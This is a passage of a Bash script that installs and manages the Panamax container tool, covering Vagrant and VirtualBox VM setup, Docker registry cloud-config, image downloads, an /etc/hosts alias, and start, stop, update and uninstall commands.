setEnvVar "PMX_IMAGE_TAG" "$PMX_IMAGE_TAG"
}
function installPanamax {
checkPreReqs
echo "" > $ENV
setEnvVar "VAGRANT_DOTFILE_PATH" "$PMX_VAR"
source $ENV
if [[ "$operation" == "install" && "`runVagrant status $PMX_VM_NAME --machine-readable | grep "MachineNotFound\|not created"`" == "" ]]; then
echo "A different VM with name $PMX_VM_NAME has been created already. Please re-install or delete $PMX_VM_NAME VM and try again."
exit 1;
fi
if [[ "$operation" == "reinstall" ]]; then
checkPanamaxVmExists
fi
if [[ $# == 0 ]]; then
echo ""
read -p "Enter memory (MB) to be allocated to Panamax VM($PMX_VM_MEMORY_DEFAULT):" panamaxRam
read -p "Enter CPUs to be allocated to Panamax VM($PMX_VM_CPUS_DEFAULT):" panamaxCpus
read -p "Enter version you want to use(dev/stable, defaults to:$PMX_IMAGE_TAG_DEFAULT)" panamaxVersion
if [[ "`grep ${PMX_LOCAL_DOMAIN} /etc/hosts`" == "" ]]; then
read -p "Would you like Panamax to create the alias (${PMX_LOCAL_DOMAIN})? (You will be prompted for sudo creds) [y/N]:" localDomain
fi
read -p "Do you want to let Docker daemon allow connections to insecure registries [y/N]: " pmxInsecureRegistry
echo ""
fi
if [[ ("`grep ${PMX_LOCAL_DOMAIN} /etc/hosts`" == "") && ("${localDomain}" == "y" || "${localDomain}" == "Y") ]]; then
echo "Setting local alias to ${PMX_LOCAL_DOMAIN}"
if [[ "${sudoPassword}" == "" ]]; then
sudo -S -- sh -c "echo \"${PMX_VM_PRIVATE_IP} ${PMX_LOCAL_DOMAIN}\" >> /etc/hosts"
else
echo ${sudoPassword} | sudo -S -- sh -c "echo \"${PMX_VM_PRIVATE_IP} ${PMX_LOCAL_DOMAIN}\" >> /etc/hosts"
fi
fi
panamaxRam=${panamaxRam:-$PMX_VM_MEMORY_DEFAULT}
panamaxCpus=${panamaxCpus:-$PMX_VM_CPUS_DEFAULT}
redownload=${download:-N}
pmxInsecureRegistry=${pmxInsecureRegistry:-$PMX_INSECURE_REGISTRY}
PMX_IMAGE_TAG=${panamaxVersion:-${PMX_IMAGE_TAG:-$PMX_IMAGE_TAG_DEFAULT}}
if [ ! -d "$CWD" ]; then
mkdir -p "$CWD"
cp -Rf . "$CWD" > /dev/null
fi
if [[ "$PMX_BASEBOX" != "" && "$PMX_BASEBOX" != "$BASEBOX_DEFAULT" ]]; then
vagrant box remove $PMX_BASEBOX
fi
if [[ "$PMX_PANAMAX_ID" == "" ]]; then
PMX_PANAMAX_ID="`uuidgen`"
fi
setEnvVar "PMX_BASEBOX" \"$BASEBOX_DEFAULT\"
setEnvVar "PMX_BASEBOX_URL" \"$BASEBOX_URL_DEFAULT\"
setEnvVar "PMX_VM_MEMORY" $panamaxRam
setEnvVar "PMX_VM_CPUS" $panamaxCpus
setEnvVar "PMX_VM_PRIVATE_IP" \"${PMX_VM_PRIVATE_IP}\"
saveVersionInfo
setEnvVar "PMX_OPERATION" "$operation"
setEnvVar "PMX_VM_NAME" "$PMX_VM_NAME"
setEnvVar "PMX_PANAMAX_ID" \"${PMX_PANAMAX_ID}\"
setEnvVar "PMX_VAR_DIR" "$PMX_VAR"
setEnvVar "PMX_INSECURE_REGISTRY" "$pmxInsecureRegistry"
source "$ENV"
if [[ $operation == "reinstall" ]]; then
echo ""
echo "Reinstalling Panamax..."
if [[ "$#" == "0" ]]; then
read -p "Would you like to re-download coreos base box[y/N]: " redownload
fi
if [[ -f "$IMAGES_VDI" ]]; then
if [[ "`vboxmanage list runningvms | grep $PMX_VM_NAME`" != "" ]]; then
VBoxManage controlvm $PMX_VM_NAME poweroff
fi
VBoxManage storageattach $PMX_VM_NAME --storagectl "IDE Controller" --port 1 --device 0 --type hdd --medium 'none' > /dev/null 2>&1
VBoxManage closemedium disk $IMAGES_VDI > /dev/null 2>&1
VBoxManage internalcommands sethduuid $IMAGES_VDI
fi
VBoxManage unregistervm $PMX_VM_NAME --delete
if [[ $redownload == "Y" || $redownload == "y" ]]; then
vagrant box remove $PMX_BASEBOX
vagrant box add $PMX_BASEBOX $PMX_BASEBOX_URL
fi
updateCloudConfig
createPmxVM
else
updateCloudConfig
createPmxVM
fi
openPanamax;
}
function updateCloudConfig {
if [[ "`echo $PMX_INSECURE_REGISTRY | tr '[:upper:]' '[:lower:]'`" == "y" ]]; then
echo "#cloud-config
write_files:
- path: /etc/systemd/system/docker.service.d/50-insecure-registry.conf
content: |
[Service]
Environment=DOCKER_OPTS='--insecure-registry=\"0.0.0.0/0\"'" > $CWD/user-data
else
echo "#cloud-config
write_files:
- path: /etc/systemd/system/docker.service.d/50-insecure-registry.conf
content: |
[Service]
Environment=DOCKER_OPTS='--insecure-registry=\"10.10.10.254/24\"'" > $CWD/user-data
fi
if [[ -f "$PMX_VAR/cloud_config_usr.yaml" ]]; then
cat $PMX_VAR/cloud_config_usr.yaml >> $CWD/user-data
fi
}
function createPmxVM {
echo ""
echo "Creating a new CoreOS VM..."
if [[ ! -f "$IMAGES_VDI" ]]; then
if [[ -f "$IMAGES_ZIP" ]]; then
tar -zxf "$IMAGES_ZIP" -C "$PMX_VAR"
download_complete=$?
fi
if [[ "$download_complete" != "0" || ! -f "$IMAGES_ZIP" ]]; then
echo "Downloading images"
download_complete="-1"
until [ "$download_complete" == "0" ];
do
curl -C - $IMAGES_CDN -o "$IMAGES_ZIP" --progress-bar
sleep 2
tar -tzf "$IMAGES_ZIP" >/dev/null
download_complete=$?
done
fi
tar -zxf "$IMAGES_ZIP" -C "$PMX_VAR"
fi
if [[ ! -f "$IMAGES_VDI" ]]; then
echo "Error downloading images disk. Please try again later."
exit 1;
else
VBoxManage internalcommands sethduuid $IMAGES_VDI
fi
runVagrant up --provider virtualbox || { echo "VM Creation failed. Exiting."; exit 1; }
rm -f "$IMAGES_ZIP"
}
function setEnvVar {
local envVarName=`echo "$1" | sed 's/[PMX_]+//g'`
echo $"`sed "/$envVarName=/d" "$ENV"`" > "$ENV"
echo export $1=$2 >> "$ENV"
}
function openPanamax {
echo "waiting for panamax to start....."
local pmxUrl="http://${PMX_VM_PRIVATE_IP}:3000"
if [[ "`grep ${PMX_LOCAL_DOMAIN} /etc/hosts`" != "" ]]; then
pmxUrl="http://${PMX_LOCAL_DOMAIN}:3000"
fi
until [ `curl -sL -w "%{http_code}" "${pmxUrl}" -o /dev/null` == "200" ];
do
printf .
sleep 2
done
echo ""
open "${pmxUrl}" || { echo "Please go to ${pmxUrl}" to access panamax; }
echo "Please go to ${pmxUrl} to access panamax."
echo ""
echo ""
}
function savePortForwardingRules {
VBoxManage showvminfo $PMX_VM_NAME --machinereadable | grep 'Forwarding' | awk -F"=" '{print $2}' | sed 's/\"//g' | sed "s/^/VBoxManage controlvm $PMX_VM_NAME natpf1 \'/g" | sed "s/,/\',/" > "$CWD.portForwards.sh"
}
function recreatePortForwardingRules {
chmod +x "$CWD.portForwards.sh"
/bin/bash -c "cd $CWD && ./.portForwards.sh > /dev/null 2>&1" || true
}
function restartPanamax {
checkPreReqs
checkPanamaxVmExists
echo Restarting Panamax
setEnvVar "PMX_OPERATION" "$operation"
source "$ENV"
savePortForwardingRules
updateCloudConfig
runVagrant reload --provision || { echo >&2 "Restarting Panamax seems to have failed. Please try again using the reinstall option."; exit 1; }
recreatePortForwardingRules
echo $?
openPanamax;
echo Restart complete
}
function startPanamax {
checkPreReqs
checkPanamaxVmExists
echo Starting Panamax
setEnvVar "PMX_OPERATION" "$operation"
source "$ENV"
savePortForwardingRules
runVagrant up --provision || { echo >&2 "Starting Panamax seems to have failed. Please try again or use reinstall option."; exit 1; }
recreatePortForwardingRules
openPanamax
echo Start Complete
}
function stopPanamax {
checkPreReqs
checkPanamaxVmExists
echo Stopping Panamax
setEnvVar "PMX_OPERATION" "$operation"
source "$ENV"
runVagrant halt || { echo >&2 "Stopping Panamax seems to have failed. Please try again using the reinstall option."; exit 1; }
echo Panamax stopped.
}
function updatePanamax {
checkPreReqs
checkPanamaxVmExists
setEnvVar "PMX_OPERATION" "$operation"
setEnvVar "PMX_IMAGE_TAG" "$PMX_IMAGE_TAG"
source "$ENV"
checkForPanamaxUpdate
if [[ $updateAvailableForPmx == "1" ]]; then
echo Updating Panamax
savePortForwardingRules
runVagrant reload --provision || { echo >&2 "Updating Panamax seems to have failed. Please try again using the reinstall option."; exit 1; }
recreatePortForwardingRules
openPanamax;
saveVersionInfo
checkForSetupUpdate
echo Update Complete
else
echo "Panamax is already up to date."
fi
}
function uninstallPanamax {
checkPanamaxVmExists
setEnvVar "PMX_OPERATION" "$operation"
echo Uninstalling Panamax
runVagrant destroy -f
vagrant box remove $PMX_BASEBOX
echo Uninstall complete.
}
function sshToPanamax {
runVagrant ssh
}
function debug {
checkPanamaxVmExists
echo "Printing current env settings..."
sed 's/export //g' $ENV
}
function showShortHelp {
echo "panamax {init|up|pause|restart|info|check|download|reinstall|delete|help} [-ppUi=<panamax UI port>] [-ppApi=<panamax API port>] [--dev|stable] [-Id=y|n] [-sp=<sudo password>] [--memory=1536] [--cpu=2]"
echo ""
}
function showLongHelp {
showShortHelp
echo ""
echo $'\n' $'\n' "$echo_install" $'\n' "$echo_stop" $'\n' "$echo_start" $'\n' "$echo_restart" $'\n' "$echo_reinstall" $'\n' "$echo_info" $'\n' "$echo_checkUpdate" $'\n' "$echo_update" $'\n' "$echo_uninstall" $'\n' "$echo_ssh" $'\n' "$echo_help"
echo ""
}
function readParams {
for i in "$@"
do
case `echo $i | tr '[:upper:]' '[:lower:]'` in
--dev)
PMX_IMAGE_TAG=dev;;
--stable)
PMX_IMAGE_TAG=stable;;
--memory=*)
panamaxRam="${i#*=}";;
--cpu=*)
panamaxCpus="${i#*=}";;
install|init)
operation=install;;
uninstall|delete)
operation=uninstall;;
stop|pause)
operation=stop;;
start|up)
operation=start;;
restart)
operation=restart;;
update|download)
operation=update;;
check)
operation=check;;
info|--version|-v)
operation=info;;
reinstall)
operation=reinstall;;
ssh)
operation=ssh;;
debug)
operation=debug;;
-op=*|--operation=*)
operation="${i#*=}";;
-vd=*|--vagrantdownload=*)
download="${i#*=}";;
-ld=*|--localdomain=*)
localDomain="${i#*=}";;
-sp=*|--sudopassword=*)
sudoPassword="${i#*=}";;
--help|-h|help)
showLongHelp;
exit 1;;
-sv)
getPanamaxSetupVersion;;
--insecure-registry)
pmxInsecureRegistry="y";;
*)
showLongHelp;
exit 1;;
esac
done
}
function main {
if [[ -f "$ENV_COMMIT" ]]; then
cp "$ENV_COMMIT" "$ENV"
source "$ENV"
else
rm -f "$ENV"
touch "$ENV"
fi
if [[ ! -f "$PMX_VAR" ]]; then
mkdir -p "$PMX_VAR"
fi
if [[ "$1" != "-sv" ]]; then
displayLogo
fi
readParams "$@"
if [[ $# -gt 0 ]]; then
case $operation in
install) installPanamax "$@" || { showHelp; exit 1; } ;;
reinstall) installPanamax "$@" || { showHelp; exit 1; } ;;
restart) restartPanamax;;
stop) stopPanamax;;
start) startPanamax;;
check) checkForUpdate "u";;
info) checkForUpdate "e";;
update) updatePanamax;;
uninstall) uninstallPanamax;;
ssh) sshToPanamax;;
debug) debug;;
*) showLongHelp;;
esac
else
PS3="Please select one of the preceding options: "
select operation in "$echo_install" "$echo_stop" "$echo_start" "$echo_restart" "$echo_reinstall" "$echo_info" "$echo_checkUpdate" "$echo_update" "$echo_uninstall" "$echo_ssh" "$echo_help" "$echo_debug" "quit"; do
case $operation in
"$echo_install") operation="install"; installPanamax; break;;
"$echo_reinstall") operation="reinstall"; installPanamax; break;;
"$echo_restart") operation="restart"; restartPanamax; break;;
"$echo_start") operation="start"; startPanamax; break;;
"$echo_stop") operation="stop"; stopPanamax; break;;
"$echo_checkUpdate") operation="check"; checkForUpdate "u"; break;;
"$echo_info")operation="info"; checkForUpdate "e"; break;;
"$echo_update") operation="update"; updatePanamax; break;;
"$echo_uninstall") operation="uninstall"; uninstallPanamax; break;;
"$echo_help")showLongHelp; break;;
"$echo_ssh") sshToPanamax;;
"$echo_debug") debug; break;;
quit) exit 0;;
esac
done
fi
checkForUpdate
mv "$ENV" "$ENV_COMMIT"
exit 0;
}
main "$@";
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.